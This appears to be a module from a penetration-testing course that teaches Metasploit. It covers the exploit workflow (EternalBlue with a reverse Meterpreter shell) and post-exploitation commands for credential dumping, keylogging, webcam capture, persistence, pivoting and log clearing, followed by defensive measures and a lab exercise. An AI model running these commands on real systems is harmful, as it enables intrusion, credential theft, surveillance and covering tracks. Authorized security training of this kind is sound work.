10. Metasploit & Payload Delivery

🏗️ Metasploit Architecture: The Four Core Components

Metasploit isn't just a collection of exploits—it's a complete modular framework. Understanding its architecture helps you use it strategically rather than just running commands blindly.

• Exploits: Modules that take advantage of specific vulnerabilities to gain code execution on target systems. Each exploit module targets a specific CVE or vulnerability class on a specific platform, version, and configuration. Metasploit includes over 2,000 exploits.
• Payloads: The malicious code that runs after the exploit succeeds. Payloads provide the attacker with a channel back to the target—a shell, a Meterpreter session, or a command stager that downloads and executes additional tools. Payloads are completely modular—the same exploit can deliver different payloads.
• Auxiliary Modules: Non-exploitation modules for scanning, enumeration, fuzzing, credential brute-forcing, and denial of service. auxiliary/scanner/portscan/tcp is a port scanner. auxiliary/scanner/http/dir_scanner finds web directories. Metasploit includes over 1,000 auxiliary modules.
• Post-Exploitation Modules: Run inside an active Meterpreter session to perform specific tasks—credential dumping, screenshot capture, persistence installation, and privilege escalation automation. These are the modules that execute after the shell is established.

⚙️ Exploits vs. Payloads: The Critical Distinction

💻 Navigating msfconsole — The Complete Workflow

msfconsole is the primary interface for Metasploit. Here is the complete workflow from launch to exploitation:

Launching and Basic Navigation:

• msfconsole — Launch Metasploit. Wait for the msf6> prompt.
• help — Show available commands.
• banner — Display a random ASCII art banner (a tradition).
• db_status — Check if the PostgreSQL database is connected. Metasploit uses a database to store scan results, discovered hosts, and credentials.
• workspace — Create and switch between workspaces to organize different engagements.

Finding the Right Exploit:

• search eternalblue — Search for modules related to EternalBlue. Returns all matching exploits, auxiliary, and post modules with their path, disclosure date, rank, and description.
• search type:exploit platform:windows smb — Search with filters for Windows SMB exploits specifically.
• search cve:2021-44228 — Search by CVE number. Find Log4Shell-related modules.
• Module ranks: Excellent (reliable, no side effects) → Great → Good → Normal → Average → Low → Manual. Always prefer Excellent and Great ranked exploits for accuracy.

The Standard Exploitation Workflow:

1. use exploit/windows/smb/ms17_010_eternalblue — Select the module.
2. info — Display full information about the module: description, targets, required options, references, and reliability notes. Always read this.
3. show options — Display all configurable parameters and their current values. Required fields marked with an asterisk must be set before running.
4. set RHOSTS 10.0.5.7 — Set the target IP. Can be a single IP, range (10.0.5.1-254), or CIDR notation (10.0.5.0/24).
5. set RPORT 445 — Set the target port (usually pre-configured correctly).
6. set payload windows/x64/meterpreter/reverse_tcp — Select the payload.
7. set LHOST 10.0.0.1 — Your IP address (where the reverse shell connects back to).
8. set LPORT 4444 — Your listening port.
9. check — (If available) Test if the target is vulnerable without exploiting it. Not all modules support this.
10. exploit (or run) — Launch the attack.

If the exploit succeeds: You'll see [*] Meterpreter session 1 opened and your prompt changes to meterpreter>.

👑 Meterpreter — Post-Exploitation Mastery

Meterpreter is an advanced, extensible payload that operates entirely in memory on the target system. It leaves no executable on the disk—making it significantly harder to detect with file-scanning antivirus. It communicates over an encrypted channel and provides a rich set of post-exploitation capabilities:

System Information and Navigation:

• sysinfo — Display computer name, OS version, architecture, and domain.
• getuid — Show the current user running the Meterpreter process.
• getpid — Show the PID of the Meterpreter process. Useful for migration.
• pwd / ls / cd — Navigate the target filesystem.
• download C:\\Users\\Admin\\Documents\\secret.docx — Download a file from the target to your machine.
• upload malware.exe C:\\Windows\\Temp\\ — Upload a file to the target.

Privilege Escalation:

• getsystem — Attempts multiple techniques (Token Impersonation, Named Pipe Impersonation, Token Duplication) to escalate to NT AUTHORITY\SYSTEM—the highest possible Windows privilege. Often succeeds on unpatched or misconfigured systems with a single command.
• getuid — After getsystem, confirm privilege escalation succeeded.

Credential Dumping:

• hashdump — Dumps the Windows SAM (Security Account Manager) database—the file storing all local user password hashes. These hashes can be cracked offline (Module 12) or used in Pass-the-Hash attacks.
• load kiwi → creds_all — Load the Mimikatz extension and dump plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS memory. This is the most powerful credential dumping capability in Metasploit.

Surveillance:

• keyscan_start → wait → keyscan_dump — Install and retrieve a software keylogger capturing all keystrokes including passwords typed while the logger was running.
• screenshare — Stream the victim's live desktop to the attacker's machine in real time.
• webcam_snap — Take a photo with the target's webcam.
• run post/multi/recon/local_exploit_suggester — Automatically identifies local privilege escalation exploits the target is likely vulnerable to.

Persistence:

• run post/windows/manage/persistence_exe STARTUP=REGISTRY — Installs a persistent backdoor that re-establishes the Meterpreter session after reboot by adding a registry Run key.
• run post/linux/manage/sshkey_persistence — Adds the attacker's SSH public key to /root/.ssh/authorized_keys for persistent root SSH access.

Pivoting — Reaching Internal Networks:

• run post/multi/manage/autoroute — Adds routes through the Meterpreter session to internal subnets the target can reach but the attacker cannot. Subsequent Metasploit operations route through the compromised host as a pivot.
• portfwd add -l 3389 -p 3389 -r 192.168.2.10 — Port forward: connects the attacker's local port 3389 to the internal target 192.168.2.10:3389 through the Meterpreter tunnel. Enables direct RDP to an internal machine.

Covering Tracks:

• clearev — Clears the Windows Application, System, and Security event logs.
• timestomp C:\\backdoor.exe -m "01/01/2019 00:00:00" — Modifies the file's Modified, Accessed, and Created timestamps to blend in with legitimate system files.

🛡️ Detecting and Defending Against Metasploit

• EDR (Endpoint Detection and Response): Modern EDR solutions (CrowdStrike, SentinelOne, Carbon Black) detect Meterpreter's in-memory behavior—process injection, LSASS memory reads, and suspicious process spawning patterns. Even fileless payloads have behavioral signatures.
• Network IDS/IPS: Metasploit's default reverse_tcp payload has well-known network signatures. Snort and Suricata have rules detecting standard Meterpreter traffic. Using HTTPS payloads (reverse_https) defeats signature-based network detection but still creates traffic patterns.
• Credential Guard (Windows 10+): Virtualization-based security isolates LSASS in a separate hypervisor-protected process. Mimikatz and load kiwi cannot access LSASS credentials when Credential Guard is enabled—one of the most important defensive configurations for Windows environments.
• Windows Defender Antivirus: Detects standard Metasploit payloads by signature. Attackers encode, obfuscate, and custom-compile payloads to bypass AV. Default payloads will trigger AV on modern Windows systems—requiring additional evasion work.
• Network Segmentation: If the compromised machine cannot reach critical internal systems, pivoting is limited. Firewall rules restricting east-west traffic significantly contain post-exploitation damage.

🧪 Lab Mission: Metasploit Exploitation

Set up a vulnerable target VM (Metasploitable2 is ideal) and complete the following:

1. Launch msfconsole and run db_nmap -sV 10.0.0.X to scan your target and store results in the Metasploit database.
2. Run hosts and services to review discovered hosts and services from the database.
3. Search for an exploit matching a discovered vulnerable service: search vsftpd 2.3.4.
4. Use the exploit, configure RHOSTS and your payload (windows or linux meterpreter depending on target).
5. Run exploit and obtain a Meterpreter session.
6. Run your post-exploitation checklist: sysinfo → getuid → hashdump → run local_exploit_suggester.
7. Attempt getsystem and confirm the result with getuid.
8. Practice pivoting: add a route to an internal subnet with autoroute and scan it through the pivot.

✅ Module 10 Summary

• Metasploit's four components are Exploits, Payloads, Auxiliary Modules, and Post-Exploitation Modules. Each serves a distinct role.
• Reverse shells (target connects to attacker) bypass firewalls better than bind shells (attacker connects to target). Use HTTPS payloads to evade network inspection.
• Meterpreter is an in-memory, encrypted payload. It provides credential dumping, privilege escalation, surveillance, persistence, and pivoting capabilities from a single session.
• Defenders use EDR behavioral detection, Credential Guard, and network segmentation to detect and contain Meterpreter sessions—signature-based detection alone is insufficient.
• Always use Metasploit only in authorized environments. Running exploits against unauthorized systems is a criminal offense regardless of whether you succeed.